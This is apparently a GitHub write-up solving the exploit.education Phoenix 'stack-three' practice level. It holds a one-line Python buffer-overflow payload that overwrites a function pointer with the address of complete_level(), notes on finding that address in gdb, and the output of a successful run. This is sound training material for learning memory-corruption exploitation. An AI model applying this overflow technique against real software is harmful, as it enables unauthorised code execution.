exploit_education_Phoenix/stack-three at master · physine/exploit_education_Phoenix · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
### Stack Three ###

# Exploit:
python -c "print 'A'*64 + '\x9d\x06\x40'" | ./stack-three

# Notes:
- We want to  overflow buffer[64] into the pointer *fp via the gets() function
  directing code flow to the function complete_level().

- As *fp is a pointer to the memory address we need to overflow it with
  a memory address of complete_level().
- We open ./stack-three in gdb and enter the 'info functions' command
  to find the memory address of complete_level().
- We can now append the memory address to a buffer to overflow buffer[64]
  and pipe it all into ./stack-three like so.

user@phoenix-amd64:/opt/phoenix/amd64$ python -c "print 'A'*64 + '\x9d\x06\x40'" | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!